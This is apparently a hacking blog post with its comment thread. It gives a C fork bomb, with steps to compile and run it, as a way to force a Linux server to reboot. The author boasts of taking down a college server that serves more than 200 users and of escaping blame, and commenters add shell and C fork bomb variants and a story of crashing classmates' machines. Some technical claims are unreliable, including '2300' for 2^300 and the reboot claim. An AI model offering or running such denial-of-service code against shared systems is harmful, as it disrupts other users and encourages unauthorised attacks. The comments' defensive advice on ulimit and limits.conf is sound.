Reboot Linux using simple fork()
We all know that the simplest function in Linux is fork(). The fork is used create a child process which is an exact copy of the calling process (parent process). You might be thinking how can such a simple function reboot a linux machine. Well I must tell you that the program I am going to discuss today uses only this fork function and can force a Linux Server which can serve as many as 100 computers to get rebooted. I have tried this on my College’s Linux Server which Serves more than 200 computers at a time and I was lucky to get out of this situation.
Warning: I am not responsible to whatever happens to your computer after exceuting the following program on your computer.
I have written a simple C Program whose source is as follows:
#include<fcntl.h>
int main()
{
int i;
for(i=1;i<=300;i++)
{
printf(“%d”,fork());
}
return(1);
}
- Open the Linux Shell.
- Write the above program in your vi Editor and save it as reboot.c
- Now compile the program using following command:
gcc -o reboot reboot.c
- Now to execute the program type the following
./reboot
and press Enter.
Explanation: In the above program, I have used a loop of 300 iterations. In the first iteration it will execute the fork command which will create a child process which is the exact copy of the parent process i.e. the child process will have the same code as the parent process and it will execute simultaneously with the parent process. So in the next iteration both parent process and the child process will execute fork command which will in turn create child processes with the exact copy of their parent processes and this process of creation of child processes will be in the power of 2 i.e. after the first iteration the total number of processes will be 1 parent and 1 child = 2 process. After 2nd iteration the number of process will be 1 parent and 3 child = 4 process. And this will continue to double and at the end the total number of processes will be 2300 which is quite a big number. If you try to calculate this value in your calc it will take atleast 1 hour. So when you will execute the above program your linux machine will get overloaded and will be forced to reboot.
I executed this program in college’s Computer Lab and all the computer got hanged and after 1 or 2 mins a Global message was displayed that “Linux server is going to Reboot”. Since nobody knew what had happened I could get away from that situation. Hope that my lab faculty don’t read this Article.
Popularity: 2% [?]
Enjoyed this article? Subscribe to Hacking Truths and get daily updates about new cool websites and programs in your email for free.
[...] Reboot Linux using simple fork() | Hacking Truths [...]
Well i am sure the orginal fork creators must have known this and there must be a protection in the existing servers or linux/unix machine where a hackers/cracker dont play such silly pranks on the servers right?
Tell you admin to set correct limits…
){:|:};: in shell
Fork bombs don’t even need C code
Try
This happened because of a bad configuration of the server.
The sysadmin should simply configure /etc/security/limits.conf to avoid this kind of problems.
you’re just talking about a .
oo. strange
fork bomb
better (i hope)
It’s called fork bomb (http://en.wikipedia.org/wiki/Fork_bomb).
Ok, it worked with your college’s server, but a sever well configured won’t accept it, and it won’t work.
Your system administrators have failed to properly configure
/etc/security/limits.conf
This configuration file can limit the number of processes that a login can have running as well as limiting other resources. See ‘man limits.conf’ for documentation.
it’s called a fork bomb… nothing new. movin’ on
How about one line “while (1) fork();”
This also assumes that the admin hasn’t ulimited your process count.
McPop.
You rediscovered the Fork Bomb:
http://en.wikipedia.org/wiki/Fork_bomb
does not work on my desktop pc with 2G ram under gnome. Seems the trick only attempts to eat resource.
You’ve rediscovered the forkbomb. It works by filling the process table. Tell your system administrator to set sane values in /etc/security/limits.conf, then you can check these from the command line with ‘ulimit -a’.
Well… I did that same thing (in school too) back in ’96 with Windows and couple of .bat scripts. And back then I didn’t code yet. I just wanted to see how fast you can eat all memory from computer with common programs. Idea can used to copy files too
That’s a simple fork bomb, as old as mankind.
Yes, this works on any system capable of multi tasking.
In which way does this lead to a reboot? You might want to reboot it as there are no resources left (while root login should still be possible to end this mess)
/etc/security/limits.conf is to limit problems like this one…
This is called a fork bomb and is pretty much the oldest DoS technique in the book. Fork bombs don’t reboot machines, though. It’s more likely that an administrator rebooted it because they saw resources were running out and weren’t experienced enough to know what was going on.
http://en.wikipedia.org/wiki/Fork_bomb
I doubt this would work on a more recent version of Linux with group scheduling. Your fork bomb would just sputter out as your process group gets starved for cycles.
Just a configuration error:
They should’ve limited the maximum number of processes using ulimit -u, that’s all. Surprisingly a lot of distributions don’t set a default in /etc/profile.
The following will do the same in a bash shell:
Congratulations,
you just created a fork bomb.
You can also create one without compiling anything, using bash commands.
May I use “ulimit” or “limits.conf” to stop this program??
pam_limits has been around for quite a long time. If a proper cap is set for user processes, this kind of fork() bomb can be prevented effectively. I wonder why your server are not configured to use it.
Situation would be more complex if the rampant fork() call is inside an *infinite* loop rather than your finite “for” loop. Even if the process cap is enforced, the surviving processes would try endlessly to fork() and consuming a lot of CPU time, causing a DoS. That’s where CPU time limit (also via PAM) kicks in.
This is called as a Fork bomb
http://en.wikipedia.org/wiki/Fork_bomb
a fork bomb!
ulimit -u 222
It’s called a fork bomb, you can create it in in bash also.. no need for a compiler:
bomb() {
bomb | bomb &
}; bomb
But any linux server going down because if this does not have a good admin. It’s easy to configure user limits:
check the file /etc/security/limits.conf
Congratulations on discovering the very old “fork bomb.” This is nothing new.
It’s a well known fork bomb. There are some way to prevent it (ulimit, pam_limits…), and grsecurity can log users who launched fork bombs!
http://en.wikipedia.org/wiki/Fork_bomb
Goto prevention….
Old news
I was on the understanding that Linux has a per user process limit, in order to stop this kind of thing happening…
Also kids, in terminal:
sudo killall reboot
should kill the original process and all of it’s forks.
Sorry but this seems very FUD-like to me.
but isn’t their a possiblity to avoid that a normal user can only start a given number of processes?
Yeah. It is called a forkbomb. I guess it will only work running as root or when ulimit is set “stupidly” to unlimited? This has been discussed to death many times. Decent distributions set a sane ulimit for users, and then it will not be a problem. If you run it as root, then you are allowed to shoot yourself in the foot
This will only work if you run it as a user with no limits set. And if you do have such account, you either should know what to do and what not to do, or your system administrator is rookie.
Congratulations, you have rediscovered the ‘fork bomb’.
Most Unix and Linux installations will have a ulimit setting to prevent exactly this kind of activity, depending on the usage of the system, it could be as low as 64.
Checking my man(1) pages, the command ‘ulimit -u’ will tell you how many processes you are allowed to own, before the fork(2) call fails with errno=EAGAIN, which means the kernel is saying ‘I’m sorry Dave, but I can’t let you to do that.’
So long as this is set-up correctly, you should never be able to force a system to reboot this way.
network_noadle
That shouldn’t work unless the system is misconfigured or you have root access (and you don’t, smarty, do you?).
This thing called forkbomb is very old (I remember commenting about it in my LUG ten years ago).
ulimit (user limits) sets several limits to users, including number of processes running.
Congrats, you’ve just discovered a fork bomb.
Nothing new here, move along.
This has been known for 30+ years.
Dude, you’ve just reinvented (poorly) the “fork bomb” (look it up in Google).
This sort of attack has been known for decades, and (unless your Linux system is very misconfigured) will not reboot the system. I suggest that, instead of a “sure way to force a reboot”, you’ve just (re)discovered a “sure way to determine whether or not your Linux system was competently installed and managed”.
Your “exposure” is more a damnation of your system administrators, than it is a flaw in Linux.
Fork bomb
http://en.wikipedia.org/wiki/Fork_bomb
This is known as a forkbomb. Google it to find some fun implementations!
Why not the old standby?
int main(){for(;;)fork();}
Does the printf help anything?
Not much of a news. It’s called fork bomb (http://en.wikipedia.org/wiki/Fork_bomb). Some Linux distributions come with limits configured ( limits.conf somewhere under /etc ) that prevents this from happening, some probably don’t have one configured. I guess yours doesn’t have.
F.
About the simplest denial of service attack one could think of
Odd. I thought Linux was immune to this going way back to the 2.0 days. I used to do this A LOT on Solaris when I was in college. The labs would be completely full and there wouldn’t be a machine to get on. I’d log in remotely from a PC into machines until I found one where the user was sitting on IRC or playing nettrek. Then I’d just crash his machine. Nine times out of 10 he’d just get up and go home rather than sit there and wait for the slow reboot.
I thought I remembered trying it on Linux at some point and not having it work.
I guess nobody told you that this is fork bomb
hahaha…
People like to show how stupid they are by repeating before reading what other ppl commented.
Hey so you are writing on linux lately …. good job man …
Fork bomb
http://en.wikipedia.org/wiki/Fork_bomb
Note : If you have any Query related to the above Article please Post it to the Support Forum.
Leave your response!
Popular Posts
Follow Me
Free SMS Alerts
For Indian Users
Send START HACKING <cityname> to 575758
* for more info click here
Recent Posts
Most Commented
Categories
Archives
Translator
Introducing Myself
Blogroll